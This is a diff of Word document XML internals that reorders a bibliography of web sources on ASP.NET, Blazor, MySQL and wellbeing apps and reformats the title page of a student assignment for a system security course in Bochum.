-    <b:Title>What is MySQL</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>02</b:DayAccessed>
-    <b:URL>https://dev.mysql.com/doc/refman/8.0/en/what-is-mysql.html</b:URL>
-    <b:RefOrder>9</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gui24</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{8C606573-84FB-4A74-B857-392099D032A0}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Ros</b:Last>
-            <b:First>Guillem</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>How to use Hevy</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>10</b:DayAccessed>
-    <b:URL>https://www.hevyapp.com/hevy-tutorial/</b:URL>
-    <b:RefOrder>4</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bog24</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{592DD6F7-663A-47C9-B4E1-4508265F7112}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Sandu</b:Last>
-            <b:First>Bogdan</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>5 Apps Like Finch To Improve Your Mental Health</b:Title>
-    <b:ProductionCompany>TMS</b:ProductionCompany>
-    <b:Year>2024</b:Year>
-    <b:Month>Febuary</b:Month>
-    <b:Day>11</b:Day>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>10</b:DayAccessed>
-    <b:URL>https://tms-outsource.com/blog/posts/apps-like-finch/</b:URL>
-    <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ahe24</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{23598039-5EFF-4BD6-9269-048E3EDFDABC}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Ahead</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>Daylio - A Wellbeing App</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>10</b:DayAccessed>
-    <b:URL>https://www.ahead.ie/daylio</b:URL>
-    <b:RefOrder>2</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>StackOverflow</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{71F50902-896D-478C-9DF6-FA3A50AAEBF3}</b:Guid>
-    <b:Title>Stack Overflow Developer Survey 2024</b:Title>
-    <b:Year>2024</b:Year>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Stack Overflow</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>14</b:DayAccessed>
-    <b:URL>https://survey.stackoverflow.co/2024/technology/#2-web-frameworks-and-technologies</b:URL>
-    <b:RefOrder>6</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>OWA23</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{57833A1F-D5C4-4D76-85A8-7F5C9B810612}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>OWASP</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>Password Storage Cheat Sheet</b:Title>
-    <b:Year>2023</b:Year>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>17</b:DayAccessed>
-    <b:URL>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</b:URL>
-    <b:RefOrder>11</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Mic243</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{D44DA361-7CAA-46D6-B1DB-B852A944FA49}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Microsoft</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:Title>Build a .NET MAUI Blazor Hybrid app with a Blazor Web App</b:Title>
-    <b:YearAccessed>2024</b:YearAccessed>
-    <b:MonthAccessed>October</b:MonthAccessed>
-    <b:DayAccessed>17</b:DayAccessed>
-    <b:URL>https://learn.microsoft.com/en-us/aspnet/core/blazor/hybrid/tutorials/maui-blazor-web-app?view=aspnetcore-8.0</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-</b:Sources>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Dokumentum" ma:contentTypeID="0x010100804405677F68524E887B9BAD647EC267" ma:contentTypeVersion="17" ma:contentTypeDescription="Új dokumentum létrehozása." ma:contentTypeScope="" ma:versionID="76fc60fa35090df738af56597c20442c">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="2c71b88f-36ae-449a-8a52-10e2658bdd67" xmlns:ns4="ae689388-e07a-4908-9d5a-df7298fe66fc" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="b0fbbcf4c3d3a80139dc1bb83a4232cb" ns3:_="" ns4:_="">
     <xsd:import namespace="2c71b88f-36ae-449a-8a52-10e2658bdd67"/>
@@ -4527,15 +4348,206 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BFA6786E-AF7B-4A38-BBCA-BF31ECFEA1DF}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
+  <b:Source>
+    <b:Tag>Mic24</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{0073F013-6D5F-4606-9619-199470B72B61}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Microsoft</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>What is ASP.NET Core</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>September</b:MonthAccessed>
+    <b:DayAccessed>28</b:DayAccessed>
+    <b:URL>https://dotnet.microsoft.com/en-us/learn/aspnet/what-is-aspnet-core</b:URL>
+    <b:RefOrder>5</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gra19</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{0023DC8F-EE4E-49BF-8AA1-FC23135D0750}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Adobe Acrobat Team</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>Fast-forward — comparing a 1980s supercomputer to the modern smartphone</b:Title>
+    <b:Year>2022</b:Year>
+    <b:Month>August</b:Month>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>04</b:DayAccessed>
+    <b:URL>https://blog.adobe.com/en/publish/2022/11/08/fast-forward-comparing-1980s-supercomputer-to-modern-smartphone</b:URL>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Mic242</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{11AB6DA6-D471-47C8-9787-23B1CD788504}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Microsoft</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>How Blazor works</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>10</b:DayAccessed>
+    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/3-how-blazor-works</b:URL>
+    <b:RefOrder>8</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Mic241</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{DC716AFD-7D9B-4295-ACEB-8ABB9F132259}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Microsoft</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>What is Blazor?</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>10</b:DayAccessed>
+    <b:URL>https://learn.microsoft.com/en-us/training/modules/blazor-introduction/2-what-is-blazor</b:URL>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ora24</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{8E8F59A1-5E4C-4F43-B41B-AF71B2F4EDAF}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Oracle</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>What is MySQL</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>02</b:DayAccessed>
+    <b:URL>https://dev.mysql.com/doc/refman/8.0/en/what-is-mysql.html</b:URL>
+    <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gui24</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{8C606573-84FB-4A74-B857-392099D032A0}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Ros</b:Last>
+            <b:First>Guillem</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>How to use Hevy</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>10</b:DayAccessed>
+    <b:URL>https://www.hevyapp.com/hevy-tutorial/</b:URL>
+    <b:RefOrder>4</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bog24</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{592DD6F7-663A-47C9-B4E1-4508265F7112}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Sandu</b:Last>
+            <b:First>Bogdan</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>5 Apps Like Finch To Improve Your Mental Health</b:Title>
+    <b:ProductionCompany>TMS</b:ProductionCompany>
+    <b:Year>2024</b:Year>
+    <b:Month>Febuary</b:Month>
+    <b:Day>11</b:Day>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>10</b:DayAccessed>
+    <b:URL>https://tms-outsource.com/blog/posts/apps-like-finch/</b:URL>
+    <b:RefOrder>3</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ahe24</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{23598039-5EFF-4BD6-9269-048E3EDFDABC}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Ahead</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>Daylio - A Wellbeing App</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>10</b:DayAccessed>
+    <b:URL>https://www.ahead.ie/daylio</b:URL>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>StackOverflow</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{71F50902-896D-478C-9DF6-FA3A50AAEBF3}</b:Guid>
+    <b:Title>Stack Overflow Developer Survey 2024</b:Title>
+    <b:Year>2024</b:Year>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Stack Overflow</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>14</b:DayAccessed>
+    <b:URL>https://survey.stackoverflow.co/2024/technology/#2-web-frameworks-and-technologies</b:URL>
+    <b:RefOrder>6</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>OWA23</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{57833A1F-D5C4-4D76-85A8-7F5C9B810612}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>OWASP</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>Password Storage Cheat Sheet</b:Title>
+    <b:Year>2023</b:Year>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>17</b:DayAccessed>
+    <b:URL>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</b:URL>
+    <b:RefOrder>11</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Mic243</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{D44DA361-7CAA-46D6-B1DB-B852A944FA49}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Microsoft</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:Title>Build a .NET MAUI Blazor Hybrid app with a Blazor Web App</b:Title>
+    <b:YearAccessed>2024</b:YearAccessed>
+    <b:MonthAccessed>October</b:MonthAccessed>
+    <b:DayAccessed>17</b:DayAccessed>
+    <b:URL>https://learn.microsoft.com/en-us/aspnet/core/blazor/hybrid/tutorials/maui-blazor-web-app?view=aspnetcore-8.0</b:URL>
+    <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+</b:Sources>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{5283BDE5-2110-47A1-B6BF-261D767F66A4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
@@ -4545,15 +4557,15 @@
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C30AA391-316B-4E95-AE8C-64681E201677}">
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BFA6786E-AF7B-4A38-BBCA-BF31ECFEA1DF}">
   <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0B5E8B16-0AFB-408B-BF8C-70E4A1B923B3}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -4570,4 +4582,12 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C30AA391-316B-4E95-AE8C-64681E201677}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/5/Assignment_5_documentation.docx
+++ b/5/Assignment_5_documentation.docx
@@ -1,17 +1,20 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
+<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w14 wp14 w15">
   <w:body>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Picture"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
+        <w:keepNext w:val="true"/>
+        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
+        <w:ind w:hanging="0"/>
+        <w:jc w:val="center"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DF5FF32" wp14:editId="714C0664">
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5400040" cy="1224280"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1" name="Picture 1" descr="Verbundprojekt: Migrantenorganisationen und die Ko-Produktion sozialer ..."/>
@@ -28,7 +31,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId2"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -81,31 +84,74 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapkarstanszk"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Systemsicherheit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (211011-SS 2026)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="0"/>
-      </w:pPr>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Systemsicherheit (211011-SS 2026)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:ind w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:cs="Arial"/>
@@ -138,30 +184,36 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr/>
         <w:t>Matias Soto</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapszerz"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Matej Heřman</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Cmlapszerz"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>Daniel Szabo</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
@@ -176,670 +228,212 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
         <w:keepLines/>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:smallCaps/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="0"/>
+      <w:r>
+        <w:rPr>
+          <w:smallCaps/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:hanging="0"/>
         <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
         <w:t>BOCHUM, 2026</w:t>
       </w:r>
       <w:r>
+        <w:rPr/>
         <w:fldChar w:fldCharType="begin"/>
       </w:r>
       <w:r>
+        <w:rPr/>
         <w:instrText xml:space="preserve"> SUBJECT </w:instrText>
       </w:r>
       <w:r>
+        <w:rPr/>
